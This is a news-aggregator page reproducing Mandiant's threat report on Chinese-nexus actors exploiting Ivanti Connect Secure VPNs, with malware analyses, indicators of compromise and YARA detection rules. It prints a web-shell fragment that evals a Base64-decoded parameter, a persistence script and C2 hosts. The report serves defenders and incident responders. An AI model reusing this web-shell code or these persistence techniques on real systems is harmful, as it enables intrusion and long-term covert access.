♊️ GemiNews 🗞️

Demo 1: Embeddings + Recommendation Demo 2: Bella RAGa Demo 3: NewRetriever Demo 4: Assistant function calling

🗞️Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies

🗿Semantically Similar Articles (by :title_embedding)

Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies

2024-04-04 - Mandiant (from Google Cloud Blog)

Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan   Since the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325.  This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied.  Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives. As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest patching guidance and instructions to prevent further exploitation activity. In addition, Ivanti released a new enhanced external integrity checker tool (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening guide, which includes recommendations. Mandiant recommends customers run both the internal and the latest external ICT released alongside a new patch on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process. Clustering and Attribution Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations. In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions.  In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure. UNC5221 UNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous blog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024. UNC5266 Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.  UNC5330 UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence. Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.  UNC5337 UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.  UNC5291 UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access. New TTPs and Malware Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec. SPAWN Malware Family During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection.  Figure 1 illustrates how the SPAWN malware family operates. Figure 1: SPAWN malware family diagram SPAWNANT SPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and exports an sprintf function adding a malicious code to it before redirecting a flow back to vsnprintf. SPAWNMOLE SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor. The malware attempts to inject itself into a process named web. The malware attempts to hijack the accept API from the libc binary within web process. The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection. The malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at offset 0x1b of the received buffer. SPAWNSNAIL SPAWNSNAIL (libdsmeeting.so) is a backdoor that listens on localhost. It is designed to run by injecting into the dsmdm process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL. SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (.liblogblock.so) into dslogserver, a process supporting event logging on Connect Secure. SPAWNSNAIL checks if its binary name is dsmdm; if it is running under that name, it creates two threads: First thread drops a hard-coded SSH host private key to /tmp/.dskey, configures libssh to use the key, and then deletes /tmp/.dskey. The malware binds to localhost on port 8300. The SSH server requires public key authentication. When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive bash shell. The second thread injects a log tampering utility, SPAWNSLOTH (/tmp/.liblogblock.so), into the dslogserver process up to three times. SPAWNSLOTH SPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating. SPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging function of dslogserver). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server. Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running. Getting to the Root of It During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting CVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218. Figure 2 shows the code inserted into the setcookie.thmtl.ttc file that contains ROOTROT. The web shell can be accessed at /dana-na/auth/setcookie.cgi. It parses the issued decoded Base64-encoded command and executes it with eval.  $output .= "</body>\n\n</html>\n"; $output .= "<!--\n"; my $key = CGI::param('[REDACTED]'); use MIME::Base64; if(defined($key)){ my $arg=decode_base64("$key"); eval($arg); } $output .= "-->\n"; } }; if ($@) { $error = $context->catch($@, \$output); die $error unless $error->type eq 'return'; } return $output; }, Figure 2: Code block inserted into the setcookie.thtml.ttc file During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of  <!--\n and -->\n at the end of the response from /dana-na/auth/setcookie.cgi.  As of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc. Lateral Movement Leading to vCenter Compromise Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH.  After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine. Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (/home/vsphere-ui/vcli). Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, vami-http.  BRICKSTORM BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2. Upon execution, BRICKSTORM checks for an environment variable, WRITE_LOG, to determine if the file needs to be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample from /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd. It will then execute the copied BRICKSTORM sample and terminate execution.  If WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd, and continues execution. BRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the environment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file /home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd. Then, it sets the appropriate environment variables and spawns the process. The watcher process then begins monitoring the exit status of the child process. If it finds the environment variable WORKER is set to true, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the Watcher function. BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of  wss://opra1.oprawh.workers[.]dev. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses. https://9.9.9.9/dns-query https://45.90.28.160/dns-query https://45.90.30.160/dns-query https://149.112.112.112/dns-query https://9.9.9.11/dns-query https://1.1.1.1/dns-query https://1.0.0.1/dns-query https://8.8.8.8/dns-query https://8.8.4.4/dns-query Figure 3: DNS over HTTPS addresses BRICKSTORM appears to leverage a custom Go package called wssoft. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware. Table 1 provides the four core functions provided by wssoft. Function Comments Spawning a web server See below for accepted routes/endpoints Command execution Executes shell commands using /bin/sh Command execution (“NoContext”) Executes shell commands using calls to os. Exec likely accepts commands run_shell and exit SOCKS relaying Connection proxying Table 1: wssoft capabilities When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses Gorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON. Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests. Endpoint Function /api/file/change-dir Change directory /api/file/delete-dir Deletes a directory /api/file/delete-file Deletes a file /api/file/mkdir Makes a directory (create subdirectories as necessary) /api/file/list-dir Lists directory contents /api/file/rename Renames a file /api/file/put-file File upload given a destination path, can optionally append to file /api/file/get-file File download /api/file/slice-up May upload large files in separate chunks /api/file/file-md5 Calculates file MD5 /api/file/up Uploads a file using a web form (includes SHA256 hashing) /api/file/stat Gets file information Table 2: BRICKSTORM endpoints Lateral Movement Leading to Active Directory Compromise UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally. Attack Path Diagram Figure 4: UNC5330 attack path diagram Windows Certificate Template Abuse  UNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, testComputer$. UNC5330 used the newly created testComputer$ computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to Domain Computers. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement. Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor. WMI Event Consumers WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following: Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with cmd.exe. Wrote command output to a .log file in C:\Windows\Temp. Deleted the scheduled task. The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET. TONERJAM TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution. PHANTOMNET PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed. SLIVER C2 During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a systemd service file to register one of the copies of SLIVER as a persistent daemon. Path Description /home/bin/netmon SLIVER /home/bin/logd SLIVER /home/runtime/logd SLIVER /home/config/logd.spec.cfg systemd service unit configuration file Table 3: SLIVER components Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant. TERRIBLETEA At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an anonymous file sharing site: pan.xj.hk. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes. TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including: Command execution Keystroke logging SOCKS5 proxy Port scanning File system interaction SQL query execution Screen captures Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed: chmod +x /tmp/.udevd /tmp/.udevd <args> ls -lahrt /home/ TERRIBLETEA can take different execution paths depending on what environment it is configured for, either linux_amd64 or darwin_amd64. In this instance, TERRIBLETEA is configured for the linux_amd64 environment. The sample persists with a Bash profile script located at /etc/profile.d/cron.sh for persistence. # Initialization script for bash and sh # export AFS if you are in AFS environment a=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'` if [ "$a" -eq 0 ] then /bin/cron fi Figure 5: TERRIBLETEA Bash profile script Outlook and Implications The activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe.  Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously reported by Mandiant, China-nexus actors continue to evolve their stealth to avoid detection by defenders. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting. Indicators of Compromise (IOCs) Host-Based Indicators (HBIs) Filename MD5 Description data.dat 9d684815bc96508b99e6302e253bc292 PHANTOMNET epdevmgr.dll b210a9a9f3587894e5a0f225b3a6519f TONERJAM libdsproxy.so 4f79c70cce4207d0ad57a339a9c7f43c SPAWNMOLE libdsmeeting.so e7d24813535f74187db31d4114f607a1 SPAWNSNAIL .liblogblock.so 4acfc5df7f24c2354384f7449280d9e0  SPAWNSLOTH .dskey 3ef30bc3a7e4f5251d8c6e1d3825612d SPAWNSNAIL private key N/A bb3b286f88728060c80ea65993576ef8 TERRIBLETEA N/A cfca610934b271c26437c4ce891bad00 TERRIBLETEA N/A 08a817e0ae51a7b4a44bc6717143f9c2 TERRIBLETEA linb64.png e7fdbed34f99c05bb5861910ca4cc994 SLIVER lint64.png c251afe252744116219f885980f2caea SLIVER linb64.png 4f68862d3170abd510acd5c500e43548 SLIVER lint64.png 9d0b6276cbc4c8b63c269e1ddc145008 SLIVER logd 71b4368ef2d91d49820c5b91f33179cb SLIVER winb64.png d88bbed726d79124535e8f4d7de5592e SLIVER logd.spec.cfg 846369b3a3d4536008a6e1b92ed09549 SLIVER persistence N/A 8e429d919e7585de33ea9d7bb29bc86b SLIVER downloader N/A fc1a8f73010f401d6e95a42889f99028 PHANTOMNET N/A e72efc0753e6386fbca0a500836a566e PHANTOMNET N/A 4645f2f6800bc654d5fa812237896b00 BRICKSTORM Table 4: Host-based indicators Network-Based Indicators (NBIs) Network Indicator Type Description 8.218.240[.]85 IPv4 Post-exploitation activity 98.142.138[.]21 IPv4 Post-exploitation activity 103.13.28[.]40 IPv4 Post-exploitation activity 103.27.110[.]83 IPv4 Post-exploitation activity 103.73.66[.]37 IPv4 Post-exploitation activity 193.149.129[.]191 IPv4 Post-exploitation activity 206.188.196[.]199 IPv4 Post-exploitation activity oast[.]fun Domain Pre-exploitation validation cpanel.netbar[.]org Domain WARPWIRE Variant C2 server pan.xj[.]hk Domain Post-exploitation activity akapush.us[.]to Domain SLIVER C2 server opra1.oprawh.workers.dev Domain BRICKSTORM C2 server Table 5: Network-based indicators YARA Rules rule M_Hunting_Webshell_ROOTROT_1 { meta: author = "Mandiant" description = "This rule detects ROOTROT, a web shell written in Perl that is embedded into a legitimate Pulse Secure .ttc file to enable arbitrary command execution." md5 = "c7ffd2c06e9b7e8e0b7ac92a0dbe3294" strings: $s1 = "use MIME::Base64" ascii $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 65 36 34 28 22 24 6b 65 79 22 29} $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e 22 3b} $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e 5c 6e 22} condition: filesize < 4KB and all of them } rule M_Hunting_Backdoor_BRICKSTORM_1 { meta: author = "Mandiant" created = "2024-01-30" md5 = "4645f2f6800bc654d5fa812237896b00" descr = "Hunting rule looking for BRICKSTORM golang backdoor samples" strings: $v1 = "/home/vsphere-ui/vcli" ascii wide $v2 = "/opt/vmware/sbin" ascii wide $v3 = "/opt/vmware/sbin/vami-httpd" ascii wide $s1 = "github.com/gorilla/mux" ascii wide $s2 = "WRITE_LOG=true" ascii wide $s3 = "wssoft" ascii wide condition: uint32(0) == 0x464c457f and filesize < 6MB and 1 of ($v*) and 2 of ($s*) } import "pe" rule M_APT_Backdoor_Win_PHANTOMNET_1 { meta: author = "Mandiant" md5 = "59f4d38a5caafbc94673c6d488bf37e3" strings: $phantomnet = /\\PhantomNet-\w{1,10}\.pdb/ ascii nocase condition: (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) and all of them } rule M_APT_Backdoor_SLIVER_1 { meta: Author = “Mandiant” description = "Detects Windows, MacOS and ELF variants of the Sliver implant framework" md5 = "5ecd0c38501dfb02b682cec0a2d93aa9" strings: $s1 = ".InvokeSpawnDllReq" $s2 = ".(*InvokeSpawnDllReq).Reset" $s3 = ".(*InvokeSpawnDllReq).ProtoMessage" $s4 = ".(*InvokeSpawnDllReq).ProtoReflect" $s5 = ".(*InvokeSpawnDllReq).Descriptor" $s6 = ".(*InvokeSpawnDllReq).GetData" $s7 = ".(*InvokeSpawnDllReq).GetProcessName" $s8 = ".(*InvokeSpawnDllReq).GetArgs" $s10 = ".(*InvokeSpawnDllReq).GetKill" $s11 = ".(*InvokeSpawnDllReq).GetPPid" $s12 = ".(*InvokeSpawnDllReq).GetProcessArgs" $s13 = ".(*InvokeSpawnDllReq).GetRequest" $s14 = ".(*InvokeSpawnDllReq).String" $s15 = ".(*InvokeSpawnDllReq).GetEntryPoint" condition: ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) and 5 of ($s*) } rule M_APT_Backdoor_TERRIBLETEA_1 { meta: author = "Mandiant" description = "This rule is designed to detect on events related to terribletea. TERRIBLETEA is a backdoor written in Go that communicates over HTTP. Its many capabilities include shell command execution, capturing screens, keystroke logging, port scanning, enumerating files, starting a SOCKS5 proxy and new SSH session, downloading files, and executing SQL queries." md5 = "bb3b286f88728060c80ea65993576ef8" strings: $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E [1-12] 80 7B ?? 64} $code_get_task = { 48 8D [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 8D [5] 41 B8 03 00 00 00 E8} $func1 = "SendRequest" fullword $func2 ="UploadResult" $func3 ="Online" $func4 ="GetCommond" condition: all of ($code*) and any of ($func*) and filesize<20MB } rule M_Launcher_TONERJAM_1 { meta: author = "Mandiant" description = "This rule detects TONERJAM, a launcher that decrypts and executes a shellcode payload stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload." strings: $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8} $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d} condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and ( ($p00_0 in (17000..28000) and $p00_1 in (3700..14000)) ) } rule M_APT_Installer_SPAWNSNAIL_1 { meta: author = "Mandiant" description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH backdoor targeting Ivanti devices. It has an ability to inject a specified binary to other process, running local SSH backdoor when injected to dsmdm process, as well as injecting additional malware to dslogserver" md5 = "e7d24813535f74187db31d4114f607a1" strings: $priv = "PRIVATE KEY-----" ascii fullword $key1 = "%d/id_ed25519" ascii fullword $key2 = "%d/id_ecdsa" ascii fullword $key3 = "%d/id_rsa" ascii fullword $sl1 = "[selinux] enforce" ascii fullword $sl2 = "DSVersion::getReleaseStr()" ascii fullword $ssh1 = "ssh_set_server_callbacks" ascii fullword $ssh2 = "ssh_handle_key_exchange" ascii fullword $ssh3 = "ssh_add_set_channel_callbacks" ascii fullword $ssh4 = "ssh_channel_close" ascii fullword condition: uint32(0) == 0x464c457f and $priv and any of ($key*) and any of ($sl*) and any of ($ssh*) } rule M_APT_Installer_SPAWNANT_1 { meta: author = "Mandiant" description = "Detects SPAWNANT. SPAWNANT is an Installer targeting Ivanti devices. Its purpose is to persistently install other malware from the SPAWN family (SPAWNSNAIL, SPAWNMOLE) as well as drop additional webshells on the box." strings: $s1 = "dspkginstall" ascii fullword $s2 = "vsnprintf" ascii fullword $s3 = "bom_files" ascii fullword $s4 = "do-install" ascii $s5 = "ld.so.preload" ascii $s6 = "LD_PRELOAD" ascii $s7 = "scanner.py" ascii condition: uint32(0) == 0x464c457f and 5 of ($s*) } rule M_APT_Tunneler_SPAWNMOLE_1 { meta: author = "Mandiant" description = "Detects a specific comparisons in SPAWNMOLE tunneler, which allow malware to filter put its own traffic . SPAWNMOLE is a tunneler written in C and compiled as an ELF32 executable. The sample is capable of hijacking a process on the compromised system with a specific name and hooking into its communication capabilities in order to create a proxy server for tunneling traffic." md5 = "4f79c70cce4207d0ad57a339a9c7f43c" strings: /* 3C 16 cmp al, 16h 74 14 jz short loc_5655C038 0F B6 45 C1 movzx eax, [ebp+var_3F] 3C 03 cmp al, 3 74 0C jz short loc_5655C038 0F B6 45 C5 movzx eax, [ebp+var_3B] 3C 01 cmp al, 1 0F 85 ED 00 00 00 jnz loc_5655C125 */ $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] 3C 01 0F 85 } /* 81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h 0F 85 CD 00 00 00 jnz loc_5655C128 81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h 0F 85 C0 00 00 00 jnz loc_5655C128 */ $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 1B 0F 85} condition: uint32(0) == 0x464c457f and all of them } rule M_APT_Utility_SPAWNSLOTH_1 { meta: author = "Mandiant" description = "Detects SPAWNSLOTH. SPAWNSLOTH is an Utility targeting Ivanti devices. Its purpose is to work together with SPAWNSNAIL and block logging via dslogserver process when SPAWNSNAIL backdoor is active." md5 = "4acfc5df7f24c2354384f7449280d9e0" strings: $dslog = "dslogserver" ascii fullword $hook1 = "g_do_syslog_servers_exist" ascii fullword $hook2 = "_ZN5DSLog4File3addEPKci" ascii fullword $hook3 = "funchook_create" ascii fullword condition: uint32(0) == 0x464c457f and all of them }

[Technology] 🌎 https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement/

🗿article.to_s

------------------------------
Title: Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies
Summary: Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan

 
Since the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325. 
This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied. 
Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.
As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest patching guidance and instructions to prevent further exploitation activity. In addition, Ivanti released a new enhanced external integrity checker tool (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening guide, which includes recommendations.
Mandiant recommends customers run both the internal and the latest external ICT released alongside a new patch on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.
Clustering and Attribution
Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations. In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions. 
In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.
UNC5221
UNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous blog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.
UNC5266
